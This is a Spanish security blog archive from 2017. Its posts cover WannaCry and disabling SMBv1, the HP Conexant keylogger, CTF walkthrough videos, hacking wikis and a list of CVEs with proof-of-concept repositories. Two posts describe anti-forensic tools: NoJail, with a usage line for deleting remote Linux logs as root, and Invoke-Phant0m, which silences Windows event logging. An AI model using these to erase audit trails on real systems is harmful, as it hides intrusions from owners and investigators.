Dame una Shell, el podcast de nuestro amigo Snifer, se está convirtiendo en uno de mis podcast de referencia y no es para menos. Me encanta todo lo que salga de la cominudad y en esta edición de podcast Snifer la ha clavado. No solo le ha dado un buen repaso al Keylogger preinstalado de HP que ha sido totalmente tapado por el tema de WanaCry si no que también ha tratado el tema del Kill Switch (Ya sabies, el episodio del joven que localizo la dirección de descarga de WanaCry y la compro para par la primera versión) que a mi me tenia tan extrañado. 

Le ha salido un podcast redondo y me da envidia no poder participar. Envidia te tengo Dino! 


Muchas mas información, enlaces y fuente:



Sed Buenos ;) 

martes, 16 de mayo de 2017

Vídeo.- Python. Más rápido que C

No, aun no me queméis por hereje, se que el titulo puede llegar un poco a engaño y digo un poco por que Facundo Batista a trasteado un monto para compararlo con C hasta el punto de descubrir que optimizándolo de la forma correcta Python no es mucho mas lento que C y ganamos velocidad en escribirlo. 

Super-entretenido y curioso. Se tenéis curiosidad por ver como funcionan los lenguajes de programación por debajo os recomiendo que lo veáis. 


Sed Buenos ;) 

lunes, 15 de mayo de 2017

Stop using SMBv1

Por fin es Lunes y el estrés por el tema de Wanacry ha disminuido (al menos a mi alrededor) aunque lo estén repitiendo todo el día en las noticias. Yo por mi parte, ya que lo estaba viviendo, e intentado ver lo menos posible la información que desprendían los medios y centrarme en la comunidad, donde he podido encontrar aportaciones tan chulas como: [El GitHub de Wannacrypt0r-FACTSHEET] donde posiblemente esta toda la info que necesitas saber sobre este malware, [la entrada de hoy de fwhibbit] sobre este Malware como referencia a todos los que han escrito sobre este tema o [la entrada del Maligno  que el día después del ataque] se atrevió a explicar lo que paso con Telefónica y ademas como funcionaba el malware, es para darle un besico en el gorro.

Así que a mi solo me queda deciros lo siguiente, dejad de usar SMBv1, parchead y/o aplicad el siguiente Workaround en vuestras PowerShells:

  • set-smbserverconfiguration -EnableSMB1Protocol $false
Ah, y mostraros la siguientes viñetas que me han hecho mucha gracia: 


Sed Buenos 

domingo, 14 de mayo de 2017

HackThis Javascript 2.- Saber mates a veces va bien!

Después de un fin de semana raro entre el Ransomware y los cinco puntos en eurovisión cuando nos merecíamos los cero puntos, volvemos con los vídeos del Domingo.

Javascript es un lenguaje de programación que nos deja hacer un montón de cosas y entre ellas está la posibilidad de ayudarnos a realizar operaciones matemáticas. Pero que pasa si nos encontramos con un reto que usa Javascript para calcular que la pass es correcta.

Hoy, Kazukun, nos muestra como pasarnos el reto numero dos de Javascript jugando con las formulas. Esperamos que os guste.


Sed Buenos ;)

viernes, 12 de mayo de 2017

The Keylogger .- Conexant HD Audio Driver Package

Después de todo el el revuelo del [Ransomware de Telefónica] que ha llenado las redes sociales de revuelo y gozo, ha tapado uno de los problemas por parte de HP mas flagrantes de los últimos años. 


Resulta que han encontrado un "keylogger" llamado MicTray64.exe que se instala junto a los drivers Conexant HD Audio Driver y monitoriza las pulsaciones de tu teclado y las guarda en C:\Users\Public\MicTray.log.  Vamos, es genial y justo lo que quieres cuando te compras un portátil. Indignado me hallo.

Ordenadores afectados:
  • HP EliteBook 820 G3 Notebook PC 
  • HP EliteBook 828 G3 Notebook PC 
  • HP EliteBook 840 G3 Notebook PC 
  • HP EliteBook 848 G3 Notebook PC 
  • HP EliteBook 850 G3 Notebook PC 
  • HP ProBook 640 G2 Notebook PC 
  • HP ProBook 650 G2 Notebook PC 
  • HP ProBook 645 G2 Notebook PC 
  • HP ProBook 655 G2 Notebook PC 
  • HP ProBook 450 G3 Notebook PC 
  • HP ProBook 430 G3 Notebook PC 
  • HP ProBook 440 G3 Notebook PC 
  • HP ProBook 446 G3 Notebook PC 
  • HP ProBook 470 G3 Notebook PC 
  • HP ProBook 455 G3 Notebook PC 
  • HP EliteBook 725 G3 Notebook PC 
  • HP EliteBook 745 G3 Notebook PC 
  • HP EliteBook 755 G3 Notebook PC 
  • HP EliteBook 1030 G1 Notebook PC 
  • HP ZBook 15u G3 Mobile Workstation 
  • HP Elite x2 1012 G1 Tablet 
  • HP Elite x2 1012 G1 with Travel Keyboard 
  • HP Elite x2 1012 G1 Advanced Keyboard 
  • HP EliteBook Folio 1040 G3 Notebook PC 
  • HP ZBook 17 G3 Mobile Workstation 
  • HP ZBook 15 G3 Mobile Workstation 
  • HP ZBook Studio G3 Mobile Workstation 
  • HP EliteBook Folio G1 Notebook PC
Solución:
  • Borra los ejecutables MicTray y los archivos de log relacionados a este. 
Mucha mas información y fuente:

Sed Buenos ;)

jueves, 11 de mayo de 2017

INCIBE.- Glosario de términos de ciberseguridad

Muchas veces no nos damos cuenta pero si alguien nos cogiera por la calle hablando de nuestras cosas de "Hackers" seguro que no entendería la mitad de las palabras que decimos pues, lo mismo le pasa a tu Director y muchas veces has de ponerte en su piel y explicarle las cosas como se deben. 


INCIBE ya se ha adelantado a esto y ha preparado un glosario de términos para te puede ser muy útil si eres nuevo en este mundo o te quieres enterar de lo que hablan tus empleados.  

Link al Glosario de INCIBE: 

Bueno, aunque si emplean un lenguaje mas técnico, ni con el glosario te vas a salvar.

Sed Buenos ;)

miércoles, 10 de mayo de 2017

NoJail.- Borrando voy, borrando vengo.

Hoy me he encontrado de morros con el repositorio freedom fighting de Ivan Kwiatkowski  y no me he podido evitar curiosear en su interior. Este repositorio tiene tres scripts en Python destinados a ayudarte a borrar el posible rastro que puedas dejar pero el que mas me ha llamado la atención es NoJail. 


NoJail está destinado a buscar los posibles logs que puedan haber en determinadas rutas de un Linux remoto, borrarlos y verificar que han sido borrados. 

Rutas Linux a las que accede para borrar logs: 
  • /var/run/utmp
  • /var/log/wtmp
  • /var/log/btmp 
  • /var/log/lastlog
  • /var/**/*.log 
  • Cualquier otra ruta que le piquemos manualmente. 

También como podréis ver a continuación, tiene un uso muy simple:
  • ./nojail.py --user root --ip IP /etc/app/logs/access.log --check
Enlace al repositorio donde encontrareis muchas mas información:
Además casi no tiene dependencias y en Python eso siempre es un Win. 

Sed Buenos ;) 

Scanless.- Varios escaners Web en un comando.

Si nunca lo habéis buscado, existes muchas aplicaciones web que nos permiten hacer un escaneo de puertos a otra máquina con solo introducir la IP o el dominio de una máquina. Así que, sabiendo que con Python podemos hacer consultas a páginas web y parsear el resultado, Austin Jackson ha cogido esta idea y se ha montado una herramienta muy fácil de usar que nos permite escanear por cinco escaners de puertos distintos con solo un comando. Fácil, cómodo y si queremos podemos usar los 5 a la vez para una sola máquina. 



Escaners que utiliza:
  • yougetsignal
  • viewdns
  • hackertarget
  • ipfingerprints
  • pingeu
Usage:
  • scanless.py [-h] [-t TARGET] [-s SCANNER] [-l] [-a]
Más información y enlace a la herramienta:

Sed Buenos ;) 

lunes, 8 de mayo de 2017

Wiki.- Ultimate Android Reference

Si hace unos días hablábamos de la [wiki asombrosa sobre Hacking] donde podríamos encontrar recursos, herramientas o papers referentes para diferentes técnicas de Hacking, hoy quiero recomendaros la  Ultimate Android Reference donde encontraremos un montón den información sobre Android. 


Como no, también está en GitHub pero me ha ha venido muy bien para calmar mi curiosidad sobre la persistencia de archivos en Android. Igual que con la anterior wiki aquí podremos encontrar de todo y parece que se actualiza constantemente así que, muy recomendable. 


Enlace al Git Hub:


Sed Buenos ;) 

domingo, 7 de mayo de 2017

HackThis Javascript 1.- Where is my code!

Bueno, hoy es domingo y ya sabéis lo que toca, después de pasar por "todos" los retos intermediate (Si todos por que el 5 no está disponible a día de hoy) Kazukun se mete de lleno con el primer reto de la serie Javascript, el cual tendrá que buscar el código que contiene la palabra para pasar al siguiente reto.

Esperamos que os guste:


Sed Buenos ;) 

viernes, 5 de mayo de 2017

Vídeo.- MalwareAnalysisForHedgehogs

Hoy no quiero recomendaros un vídeo solo, si no un canal de youtube como tal, [MalwareAnalysisForHedgehogs] suben cada semana un vídeo donde trastean con algún Malware y hacen su análisis o cada cuando les da hace un podcast hablando de lo que a ellos les interesa y dando información de por donde empezar a los novatos como yo. Muy recomendable. 

Aquí tenéis un ejemplo:


Sed Buenos ;) 

jueves, 4 de mayo de 2017

Infografía.- Como ser contratado como Pentester

Hace unos días tuvimos por aquí la genial noticia de que Kazukun fue llamado para una entrevista para trabajar en este mundo que nos encanta a todos y creo que esta infografía no solo le va ir bien a el si no que a todos los estudiantes de informática que os mola todo esto también. 

No solo os quedéis con la infografía hoy os recomiendo para entender cada uno de los puntos: 


Muchas mas información sobre cada uno de los puntos de la infografía y fuente: 


Sed Buenos ;) 

miércoles, 3 de mayo de 2017

PowerShell.- Invoke-Phant0m

Una herramienta mas para PowerShell que, si alguna vez soñamos en dejar una máquina sin rastro de que hemos estado allí, nos ayudará un montón a eliminar procesos y subprocesos relacionados con nuestra actividad para que no aparezcan en el registro de Windows. 

"Este script, camina en las pilas del subproceso Event Log Service (específicamente svchost.exe) e identifica los hilos del registro de sucesos para eliminar los subprocesos del Event Log Service, por lo tanto, el sistema no podrá recopilar registros y al mismo tiempo, el Event Log Service aparecerá en ejecución."
 Vídeo de como funciona este script:


 


Enlace a la herramienta:
 
Sed Buenos ;)

martes, 2 de mayo de 2017

Paper.- El mal uso de puertos en varias App.

Siempre se ha dicho que los smartphones son ordenadores de bolsillo. Así que, ¿nunca os habéis parado de pensar qué puertos abiertos tendrán estos dispositivos? pues Yunhan Jack Jia, Qi Alfred Chen, Yikai Lin, Chao Kong, Z. Morley Mao de la Universidad de Michigan, Si y descubrieron algo muy chulo. ¿Alguna vez habéis hecho un Nmap a un smartphone? Pues si lo hacéis descubriréis lo chulos que pueden ser estos dispositivos a ese nivel, pero la buena gente de la Universidad de Michigan han descubierto que muchas aplicaciones pueden dejar puertos abiertos. Por lo que ya os podéis pensar el estropicio que se puede hacer.

Enlace al paper: 

Vídeo muestra del "estropicio":


Sed Buenos ;) 

lunes, 1 de mayo de 2017

Wiki.- Awesome Hacking

Si hace un par de días hablábamos de [Awesome CVE] un repositorio de vulnerabilidades con sus respectivas PoC (Pruebas de concepto) hoy quiero recomendaros el repositorio Awesome Hacking una especie de Wiki en GitHub, donde hay un montón de información sobre hacking y sobre cualquier tecnología que queráis trastear. 


Muy completo, hay un arsenal para hacer pruebas de la seguridad de vuestra wifi, información para que "experimentéis"con vuestro auto y/o si no os apetece, siempre podéis animaros a solucionar una de las CTFs que hay en este repositorio. 

Enlace al GitHub:


Sed Buenos ;)



domingo, 30 de abril de 2017

Vídeo.- HackThis Intermediate 6 .- "SQL"ame esta

Después de dos semanas sin vídeo hoy volvemos con el reto numero 6 de HackThis.  No siempre podemos tirar de SQLmap y siempre está bien aprender como debemos "tunear" una consulta a una base de da SQL dependiendo del código fuente de la página. No es fácil pero tampoco difícil y hoy Kazukun nos muestra como pasar el reto 6 de HackThis adecuando dicha consulta. 

Ademas hemos mejorado la entrada de los vídeos así que espero que os gusten un poco mas:


Sed Buenos ;) 

viernes, 28 de abril de 2017

Infografía.- 10 + 1 consejos sobre seguridad

Es viernes y no tengo un vídeo preparado pero INCIBE ha sacado una nueva infografía dedicada a explicar 11 consejos fáciles de aplicar para mejorar la seguridad informática de tu empresa y he tenido que aprovecharlo.  Además son consejos de sentido común y muy fáciles de aplicar así que tomad nota. 



La infografía mas grande y mucha más información:
Sed Buenos ;)

jueves, 27 de abril de 2017

PoC.- Awesome CVE

Ayer me encontré de cara con la siguiente entrada de [CyberHades] en super-conocido blog [Segu·Info] donde se presentaba Awesome CVE PoC un repositorio de GitHUb donde describen unas 80 vulnerabilidades y nos ofrece una prueba de concepto para cada una de estas vulnerabilidades.  Ademas, están actualizadas al día así que yo no puedo pedir nada mas, es un gran sistema para aprender aprender a romper cosas y para saber que procedimiento ha utilizado la gente que programa estas PoCs o exploits para encontrar y explotar estas vulnerabilidades. 


Vulnerabilidades descritas en el repositorio:
  • CVE-2013-6632
  • CVE-2014-1705
  • CVE-2014-3176
  • CVE-2014-7927
  • CVE-2014-7928
  • CVE-2015-0235
  • CVE-2015-1233
  • CVE-2015-1242
  • CVE-2015-3306
  • CVE-2015-6764
  • CVE-2015-6771
  • CVE-2015-7450
  • CVE-2015-7545
  • CVE-2015-8584
  • CVE-2016-0728
  • CVE-2016-1646
  • CVE-2016-1653
  • CVE-2016-1665
  • CVE-2016-1669
  • CVE-2016-1677
  • CVE-2016-1688
  • CVE-2016-1857
  • CVE-2016-3386
  • CVE-2016-4622
  • CVE-2016-4734
  • CVE-2016-5129
  • CVE-2016-5172
  • CVE-2016-5198
  • CVE-2016-5200
  • CVE-2016-7189
  • CVE-2016-7190
  • CVE-2016-7194
  • CVE-2016-7200
  • CVE-2016-7201
  • CVE-2016-7202
  • CVE-2016-7203
  • CVE-2016-7240
  • CVE-2016-7241
  • CVE-2016-7286
  • CVE-2016-7287
  • CVE-2016-7288
  • CVE-2016-7547
  • CVE-2016-7552
  • CVE-2016-8413
  • CVE-2016-8477
  • CVE-2016-8584
  • CVE-2016-8585
  • CVE-2016-8586
  • CVE-2016-8587
  • CVE-2016-8588
  • CVE-2016-8589
  • CVE-2016-8590
  • CVE-2016-8591
  • CVE-2016-8592
  • CVE-2016-8593
  • CVE-2016-9651
  • CVE-2017-0070
  • CVE-2017-0071
  • CVE-2017-0199
  • CVE-2017-0392
  • CVE-2017-0521
  • CVE-2017-0531
  • CVE-2017-0576
  • CVE-2017-2416
  • CVE-2017-2446
  • CVE-2017-2447
  • CVE-2017-2464
  • CVE-2017-2636
  • CVE-2017-5638
  • CVE-2017-7280
  • CVE-2017-7293
Como veis, están bastante al día. Aquí enlace al repositorio de GitHub: 
Sed Buenos ;)